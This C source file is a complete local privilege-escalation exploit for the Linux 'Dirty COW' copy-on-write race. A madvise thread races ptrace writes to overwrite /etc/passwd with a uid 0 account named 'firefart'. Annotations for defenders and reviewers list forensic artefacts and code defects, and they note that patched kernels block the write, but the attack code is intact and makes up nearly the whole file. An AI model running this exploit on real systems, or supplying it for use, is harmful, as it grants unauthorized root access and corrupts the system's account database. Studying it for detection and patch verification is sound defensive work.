  1. #include <fcntl.h>
  2. #include <pthread.h>
  3. #include <string.h>
  4. #include <stdio.h>
  5. #include <stdint.h>
  6. #include <sys/mman.h>
  7. #include <sys/types.h>
  8. #include <sys/stat.h>
  9. #include <sys/wait.h>
  10. #include <sys/ptrace.h>
  11. #include <stdlib.h>
  12. #include <unistd.h>
  13. #include <crypt.h>
  14.  
  /* File whose contents the program overwrites, and the path where it first
   * saves a copy. A /tmp/passwd.bak on a host is an artefact worth checking
   * for during triage. */
  const char *filename = "/etc/passwd";
  const char *backup_filename = "/tmp/passwd.bak";
  /* Salt handed to crypt() in generate_password_hash(). It has no "$id$"
   * prefix; on glibc that presumably selects the legacy DES scheme, which
   * uses only the first two salt characters. TODO confirm for the target libc. */
  const char *salt = "firefart";

  /* Process-wide state: written in main(), `map` is also read by madviseThread(). */
  int f;           /* descriptor from open(filename, O_RDONLY) */
  void *map;       /* result of the PROT_READ / MAP_PRIVATE mmap() of `f` */
  pid_t pid;       /* fork() return value */
  pthread_t pth;   /* thread created in the child to run madviseThread() */
  struct stat st;  /* fstat() of `f`; st_size is used to size the mapping */
  24.  
  /* One passwd-style account record. generate_passwd_line() prints the fields
   * in declaration order, separated by ':'. The struct owns none of the
   * strings; main() points them at literals and at crypt()'s return value. */
  struct Userinfo {
    char *username;  /* login name */
    char *hash;      /* password hash string */
    int user_id;     /* numeric uid */
    int group_id;    /* numeric gid */
    char *info;      /* free-text comment field */
    char *home_dir;  /* home directory path */
    char *shell;     /* login shell path */
  };
  34.  
  /*
   * Hash plaintext_pw with crypt(3), using the file-level `salt`.
   *
   * Returns whatever crypt() returns. Per crypt(3) that is a pointer to
   * storage owned by the library (do not free it; a later crypt() call may
   * overwrite it), or NULL on failure. This function does not check for NULL.
   *
   * NOTE(review): `salt` has no "$id$" prefix, so on glibc this presumably
   * produces a legacy DES hash that ignores everything after the eighth
   * password character. Confirm before reusing this anywhere a real
   * credential is stored.
   */
  char *generate_password_hash(char *plaintext_pw) {
    char *hashed = crypt(plaintext_pw, salt);
    return hashed;
  }
  38.  
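  /*
   * Format `u` as one passwd-style line:
   * "username:hash:uid:gid:info:home_dir:shell\n".
   *
   * Returns a malloc()ed, NUL-terminated string that the caller must free(),
   * or NULL if a string field is NULL, formatting fails, or allocation fails.
   *
   * The fields are copied verbatim. Nothing here rejects ':' or '\n' inside a
   * field, so a caller building records from values it does not control must
   * validate them first, or one record can turn into several.
   */
  char *generate_passwd_line(struct Userinfo u) {
    const char *format = "%s:%s:%d:%d:%s:%s:%s\n";

    // Passing NULL to "%s" is undefined behaviour, and u.hash is NULL
    // whenever crypt() failed upstream.
    if (u.username == NULL || u.hash == NULL || u.info == NULL ||
        u.home_dir == NULL || u.shell == NULL) {
      return NULL;
    }

    // First pass measures the output; snprintf reports errors as negative.
    int size = snprintf(NULL, 0, format, u.username, u.hash,
                        u.user_id, u.group_id, u.info, u.home_dir, u.shell);
    if (size < 0) {
      return NULL;
    }

    size_t cap = (size_t)size + 1;
    char *ret = malloc(cap);
    if (ret == NULL) {
      return NULL;
    }

    // Bounded second pass: a mismatch with the measured size is an error,
    // never an overrun.
    int written = snprintf(ret, cap, format, u.username, u.hash, u.user_id,
                           u.group_id, u.info, u.home_dir, u.shell);
    if (written < 0 || (size_t)written >= cap) {
      free(ret);
      return NULL;
    }
    return ret;
  }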
  48.  
  /*
   * Thread body started by the forked child in main().
   *
   * Calls madvise(map, 100, MADV_DONTNEED) on the global mapping 200000000
   * times and prints the sum of the return values. madvise() returns 0 on
   * success and -1 on error, so the printed number is minus the failure count.
   * `arg` is unused.
   *
   * For defenders: the loop repeatedly discards pages of a private read-only
   * file mapping while main() writes to the same addresses through ptrace.
   * That pairing is the copy-on-write race the program depends on. It only
   * has an effect on kernels that lack the corresponding fix.
   *
   * NOTE(review): the function is declared to return void * but falls off the
   * end without a return statement. The only caller visible here passes NULL
   * to pthread_join(), so the value is not read.
   */
  void *madviseThread(void *arg) {
    int i, c = 0;
    for(i = 0; i < 200000000; i++) {
      c += madvise(map, 100, MADV_DONTNEED);
    }
    printf("madvise %d\n\n", c);
  }
  56.  
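  /*
   * Copy the file `from` into a new file `to`.
   *
   * Returns 0 on success. Returns -1 if `to` already exists, if either file
   * cannot be opened, or if reading or writing fails. On a read or write
   * failure the partial target is removed, so no truncated copy is left.
   *
   * Changes from the fgetc/fputc version:
   *  - Bytes are moved with read()/write(). The old loop stored fgetc()'s
   *    result in a `char`, so a 0xFF byte compared equal to EOF and cut the
   *    copy short where char is signed, and the loop never ended where char
   *    is unsigned.
   *  - The target is created with O_CREAT|O_EXCL. The access() test alone
   *    left a window in which another user of a shared directory such as
   *    /tmp could place a file or symlink at `to` before it was opened.
   *  - I/O errors are reported instead of being ignored.
   * Mode 0666 (before umask) is what fopen(to, "w") would have used.
   */
  int copy_file(const char *from, const char *to) {
    // Early exit with a readable message; the O_EXCL open below is the
    // check that actually guarantees the target is new.
    if (access(to, F_OK) != -1) {
      printf("File %s already exists! Please delete it and run again\n",
             to);
      return -1;
    }

    int in_fd = open(from, O_RDONLY);
    if (in_fd < 0) {
      return -1;
    }

    int out_fd = open(to, O_WRONLY | O_CREAT | O_EXCL, 0666);
    if (out_fd < 0) {
      close(in_fd);
      return -1;
    }

    char buf[4096];
    int failed = 0;
    ssize_t got;
    while (!failed && (got = read(in_fd, buf, sizeof buf)) > 0) {
      ssize_t done = 0;
      // write() may accept fewer bytes than requested; loop until the
      // whole chunk is out.
      while (done < got) {
        ssize_t put = write(out_fd, buf + done, (size_t)(got - done));
        if (put <= 0) {
          failed = 1;
          break;
        }
        done += put;
      }
    }
    if (!failed && got < 0) {
      failed = 1;
    }

    close(in_fd);
    if (close(out_fd) != 0) {
      failed = 1;
    }

    if (failed) {
      unlink(to);
      return -1;
    }

    printf("%s successfully backed up to %s\n",
           from, to);
    return 0;
  }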
  90.  
  /*
   * Entry point. Reading the statements below in order, the program:
   *   1. copies /etc/passwd to /tmp/passwd.bak and exits if that fails;
   *   2. builds one passwd-style line for a uid 0 / gid 0 account, with the
   *      password taken from argv[1] or from getpass();
   *   3. maps /etc/passwd read-only and private, forks, and has the parent
   *      write the line into the mapping through ptrace(PTRACE_POKETEXT)
   *      while a thread in the child calls madvise(MADV_DONTNEED) on it.
   *
   * NOTE(review): step 3 matches the publicly documented Linux copy-on-write
   * race usually referred to as "Dirty COW". Kernels that carry the fix are
   * not expected to let the write reach the file. Confirm patch status
   * against the distribution's advisory.
   *
   * Artefacts a responder can look for, all taken from this code:
   *   - /tmp/passwd.bak;
   *   - /etc/passwd starting with a uid 0 entry whose comment field is "pwned";
   *   - a process that ptrace()s its own forked child;
   *   - the plaintext password in the process arguments and on stdout when it
   *     is passed as argv[1].
   *
   * NOTE(review): the return values of open(), fstat(), mmap(), fork() and
   * pthread_create() are never checked.
   */
  int main(int argc, char *argv[])
  {
    // Save a copy of the target file first; copy_file() refuses to overwrite
    // an existing backup, in which case the program stops here.
    int ret = copy_file(filename, backup_filename);
    if (ret != 0) {
      exit(ret);
    }

    struct Userinfo user;
    // Account fields for the line that will be written: uid 0 and gid 0.
    user.username = "firefart";
    user.user_id = 0;
    user.group_id = 0;
    user.info = "pwned";
    user.home_dir = "/root";
    user.shell = "/bin/bash";

    char *plaintext_pw;

    // A password given on the command line is echoed back in clear text;
    // otherwise it is read with getpass().
    if (argc >= 2) {
      plaintext_pw = argv[1];
      printf("Please enter the new password: %s\n", plaintext_pw);
    } else {
      plaintext_pw = getpass("Please enter the new password: ");
    }

    // Neither result is checked for NULL before use.
    user.hash = generate_password_hash(plaintext_pw);
    char *complete_passwd_line = generate_passwd_line(user);
    printf("Complete line:\n%s\n", complete_passwd_line);

    // Read-only descriptor and a private, read-only mapping of the file.
    // The length is the file size plus sizeof(long).
    f = open(filename, O_RDONLY);
    fstat(f, &st);
    map = mmap(NULL,
               st.st_size + sizeof(long),
               PROT_READ,
               MAP_PRIVATE,
               f,
               0);
    printf("mmap: %lx\n",(unsigned long)map);
    pid = fork();
    // Parent branch. It is also taken when fork() fails and returns -1.
    if(pid) {
      // Returns once the child has stopped itself with SIGSTOP below.
      waitpid(pid, NULL, 0);
      int u, i, o, c = 0;
      int l=strlen(complete_passwd_line);
      // For every byte offset o of the line, repeatedly poke one long-sized
      // word into the child at map + o; c sums the ptrace() return values.
      // NOTE(review): the (long *) read at complete_passwd_line + o is
      // unaligned and, near the end of the string, reads past the
      // malloc()ed buffer.
      for(i = 0; i < 10000/l; i++) {
        for(o = 0; o < l; o++) {
          for(u = 0; u < 10000; u++) {
            c += ptrace(PTRACE_POKETEXT,
                        pid,
                        map + o,
                        *((long*)(complete_passwd_line + o)));
          }
        }
      }
      printf("ptrace %d\n",c);
    }
    // Child branch: start the madvise thread, ask to be traced by the parent,
    // stop so the parent's waitpid() returns, then wait for the thread.
    else {
      pthread_create(&pth,
                     NULL,
                     madviseThread,
                     NULL);
      ptrace(PTRACE_TRACEME);
      kill(getpid(), SIGSTOP);
      pthread_join(pth,NULL);
    }

    // Both branches reach this point. The messages are printed whether or not
    // the file changed, and the plaintext password is written to stdout.
    printf("Done! Check %s to see if the new user was created.\n", filename);
    printf("You can log in with the username '%s' and the password '%s'.\n\n",
           user.username, plaintext_pw);
    printf("\nDON'T FORGET TO RESTORE! $ mv %s %s\n",
           backup_filename, filename);
    return 0;
  }